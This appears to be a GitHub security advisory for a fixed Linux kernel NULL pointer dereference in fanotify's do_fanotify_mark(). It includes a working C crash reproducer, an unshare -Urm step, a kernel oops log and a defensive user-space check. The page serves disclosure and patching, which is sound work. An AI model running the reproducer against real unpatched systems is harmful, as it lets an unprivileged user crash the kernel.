GHSA-W5HW-P7RF-8672
Vulnerability from github – Published: 2025-10-28 12:30 – Updated: 2025-10-28 12:30

In the Linux kernel, the following vulnerability has been resolved:
fanotify: Validate the return value of mnt_ns_from_dentry() before dereferencing
The function do_fanotify_mark() does not validate if mnt_ns_from_dentry() returns NULL before dereferencing mntns->user_ns. This causes a NULL pointer dereference in do_fanotify_mark() if the path is not a mount namespace object.
Fix this by checking mnt_ns_from_dentry()'s return value before dereferencing it.
Before the patch

```shell
$ gcc fanotify_nullptr.c -o fanotify_nullptr
$ mkdir A
$ ./fanotify_nullptr
Fanotify fd: 3
fanotify_mark: Operation not permitted
$ unshare -Urm
Fanotify fd: 3
Killed
```

Reproducer (fanotify_nullptr.c):

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/fanotify.h>

int main(void)
{
	int ffd;

	/* Request a group that reports mount namespace events. */
	ffd = fanotify_init(FAN_CLASS_NOTIF | FAN_REPORT_MNT, 0);
	if (ffd < 0) {
		perror("fanotify_init");
		exit(EXIT_FAILURE);
	}

	printf("Fanotify fd: %d\n", ffd);

	/* "A" is a plain directory, not a mount namespace object: on an
	 * unpatched kernel mnt_ns_from_dentry() returns NULL and
	 * do_fanotify_mark() dereferences it. */
	if (fanotify_mark(ffd, FAN_MARK_ADD | FAN_MARK_MNTNS,
			  FAN_MNT_ATTACH, AT_FDCWD, "A") < 0) {
		perror("fanotify_mark");
		exit(EXIT_FAILURE);
	}

	return 0;
}
```

After the patch

```shell
$ gcc fanotify_nullptr.c -o fanotify_nullptr
$ mkdir A
$ ./fanotify_nullptr
Fanotify fd: 3
fanotify_mark: Operation not permitted
$ unshare -Urm
Fanotify fd: 3
fanotify_mark: Invalid argument
```

Kernel log from the unpatched run (the "Killed" above):

```text
[ 25.694973] BUG: kernel NULL pointer dereference, address: 0000000000000038
[ 25.695006] #PF: supervisor read access in kernel mode
[ 25.695012] #PF: error_code(0x0000) - not-present page
[ 25.695017] PGD 109a30067 P4D 109a30067 PUD 142b46067 PMD 0
[ 25.695025] Oops: Oops: 0000 [#1] SMP NOPTI
[ 25.695032] CPU: 4 UID: 1000 PID: 1478 Comm: fanotify_nullpt Not tainted 6.17.0-rc4 #1 PREEMPT(lazy)
[ 25.695040] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
[ 25.695049] RIP: 0010:do_fanotify_mark+0x817/0x950
[ 25.695066] Code: 04 00 00 e9 45 fd ff ff 48 8b 7c 24 48 4c 89 54 24 18 4c 89 5c 24 10 4c 89 0c 24 e8 b3 11 fc ff 4c 8b 54 24 18 4c 8b 5c 24 10 <48> 8b 78 38 4c 8b 0c 24 49 89 c4 e9 13 fd ff ff 8b 4c 24 28 85 c9
[ 25.695081] RSP: 0018:ffffd31c469e3c08 EFLAGS: 00010203
[ 25.695104] RAX: 0000000000000000 RBX: 0000000001000000 RCX: ffff8eb48aebd220
[ 25.695110] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff8eb4835e8180
[ 25.695115] RBP: 0000000000000111 R08: 0000000000000000 R09: 0000000000000000
[ 25.695142] R10: ffff8eb48a7d56c0 R11: ffff8eb482bede00 R12: 00000000004012a7
[ 25.695148] R13: 0000000000000110 R14: 0000000000000001 R15: ffff8eb48a7d56c0
[ 25.695154] FS: 00007f8733bda740(0000) GS:ffff8eb61ce5f000(0000) knlGS:0000000000000000
[ 25.695162] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 25.695170] CR2: 0000000000000038 CR3: 0000000136994006 CR4: 00000000003706f0
[ 25.695201] Call Trace:
[ 25.695209] <TASK>
[ 25.695215] __x64_sys_fanotify_mark+0x1f/0x30
[ 25.695222] do_syscall_64+0x82/0x2c0
...
```
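The fix makes the kernel return EINVAL when the FAN_MARK_MNTNS target is not a mount namespace object. As an added example (not kernel or advisory code), the following C program performs the equivalent check from user space with the NS_GET_NSTYPE ioctl on the opened path; it assumes Linux with nsfs (4.11 or later), and the privileged fanotify_mark() call itself is omitted.

```c
/* Added example, not kernel or advisory code: check that a path is a mount
 * namespace object before using it as a FAN_MARK_MNTNS target. The patched
 * kernel rejects anything else with EINVAL; the buggy kernel oopses. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>
#ifndef NS_GET_NSTYPE            /* from <linux/nsfs.h>: _IO(NSIO = 0xb7, 0x3) */
#define NS_GET_NSTYPE _IO(0xb7, 0x3)
#endif
#ifndef CLONE_NEWNS              /* mount namespace type, from <sched.h> */
#define CLONE_NEWNS 0x00020000
#endif

/* CLONE_NEW* type of the namespace at path, 0 if path is not a namespace
 * object (the nsfs ioctl fails with ENOTTY), -1 on any other error. */
int ns_type_of_path(const char *path)
{
	int fd = open(path, O_RDONLY);
	if (fd < 0)
		return -1;
	int type = ioctl(fd, NS_GET_NSTYPE);
	int saved = errno;
	close(fd);
	errno = saved;
	return (type < 0 && saved == ENOTTY) ? 0 : type;
}

/* 0 when path is a mount namespace (the only valid FAN_MARK_MNTNS target);
 * otherwise -1 with errno == EINVAL, the error the fixed kernel returns. */
int validate_mntns_target(const char *path)
{
	int type = ns_type_of_path(path);
	if (type == CLONE_NEWNS)
		return 0;
	if (type >= 0)              /* opened fine, but not a mount namespace */
		errno = EINVAL;
	return -1;
}

int main(int argc, char **argv)
{
	const char *path = argc > 1 ? argv[1] : "/proc/self/ns/mnt";
	if (validate_mntns_target(path) < 0) {
		perror(path);           /* a plain directory: "Invalid argument" */
		return 1;
	}
	puts("mount namespace object: valid FAN_MARK_MNTNS target");
	return 0;
}
```

Run it with the directory from the reproducer (`./check A`) to see the same "Invalid argument" the patched kernel reports, and with `/proc/self/ns/mnt` to see a valid target.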
{
"affected": [],
"aliases": [
"CVE-2025-40072"
],
"database_specific": {
"cwe_ids": [],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-28T12:15:41Z",
"severity": null
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nfanotify: Validate the return value of mnt_ns_from_dentry() before dereferencing\n\nThe function do_fanotify_mark() does not validate if\nmnt_ns_from_dentry() returns NULL before dereferencing mntns-\u003euser_ns.\nThis causes a NULL pointer dereference in do_fanotify_mark() if the\npath is not a mount namespace object.\n\nFix this by checking mnt_ns_from_dentry()\u0027s return value before\ndereferencing it.\n\nBefore the patch\n\n$ gcc fanotify_nullptr.c -o fanotify_nullptr\n$ mkdir A\n$ ./fanotify_nullptr\nFanotify fd: 3\nfanotify_mark: Operation not permitted\n$ unshare -Urm\nFanotify fd: 3\nKilled\n\nint main(void){\n int ffd;\n ffd = fanotify_init(FAN_CLASS_NOTIF | FAN_REPORT_MNT, 0);\n if(ffd \u003c 0){\n perror(\"fanotify_init\");\n exit(EXIT_FAILURE);\n }\n\n printf(\"Fanotify fd: %d\\n\",ffd);\n\n if(fanotify_mark(ffd, FAN_MARK_ADD | FAN_MARK_MNTNS,\nFAN_MNT_ATTACH, AT_FDCWD, \"A\") \u003c 0){\n perror(\"fanotify_mark\");\n exit(EXIT_FAILURE);\n }\n\nreturn 0;\n}\n\nAfter the patch\n\n$ gcc fanotify_nullptr.c -o fanotify_nullptr\n$ mkdir A\n$ ./fanotify_nullptr\nFanotify fd: 3\nfanotify_mark: Operation not permitted\n$ unshare -Urm\nFanotify fd: 3\nfanotify_mark: Invalid argument\n\n[ 25.694973] BUG: kernel NULL pointer dereference, address: 0000000000000038\n[ 25.695006] #PF: supervisor read access in kernel mode\n[ 25.695012] #PF: error_code(0x0000) - not-present page\n[ 25.695017] PGD 109a30067 P4D 109a30067 PUD 142b46067 PMD 0\n[ 25.695025] Oops: Oops: 0000 [#1] SMP NOPTI\n[ 25.695032] CPU: 4 UID: 1000 PID: 1478 Comm: fanotify_nullpt Not\ntainted 6.17.0-rc4 #1 PREEMPT(lazy)\n[ 25.695040] Hardware name: VMware, Inc. VMware Virtual\nPlatform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020\n[ 25.695049] RIP: 0010:do_fanotify_mark+0x817/0x950\n[ 25.695066] Code: 04 00 00 e9 45 fd ff ff 48 8b 7c 24 48 4c 89 54\n24 18 4c 89 5c 24 10 4c 89 0c 24 e8 b3 11 fc ff 4c 8b 54 24 18 4c 8b\n5c 24 10 \u003c48\u003e 8b 78 38 4c 8b 0c 24 49 89 c4 e9 13 fd ff ff 8b 4c 24 28\n85 c9\n[ 25.695081] RSP: 0018:ffffd31c469e3c08 EFLAGS: 00010203\n[ 25.695104] RAX: 0000000000000000 RBX: 0000000001000000 RCX: ffff8eb48aebd220\n[ 25.695110] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff8eb4835e8180\n[ 25.695115] RBP: 0000000000000111 R08: 0000000000000000 R09: 0000000000000000\n[ 25.695142] R10: ffff8eb48a7d56c0 R11: ffff8eb482bede00 R12: 00000000004012a7\n[ 25.695148] R13: 0000000000000110 R14: 0000000000000001 R15: ffff8eb48a7d56c0\n[ 25.695154] FS: 00007f8733bda740(0000) GS:ffff8eb61ce5f000(0000)\nknlGS:0000000000000000\n[ 25.695162] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 25.695170] CR2: 0000000000000038 CR3: 0000000136994006 CR4: 00000000003706f0\n[ 25.695201] Call Trace:\n[ 25.695209] \u003cTASK\u003e\n[ 25.695215] __x64_sys_fanotify_mark+0x1f/0x30\n[ 25.695222] do_syscall_64+0x82/0x2c0\n...",
"id": "GHSA-w5hw-p7rf-8672",
"modified": "2025-10-28T12:30:17Z",
"published": "2025-10-28T12:30:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40072"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/62e59ffe8787b5550ccff70c30b6f6be6a3ac3dd"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/73ce2a774ad6497cbd48dc4f8a5d699bc417f3fa"
}
],
"schema_version": "1.4.0",
"severity": []
}
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.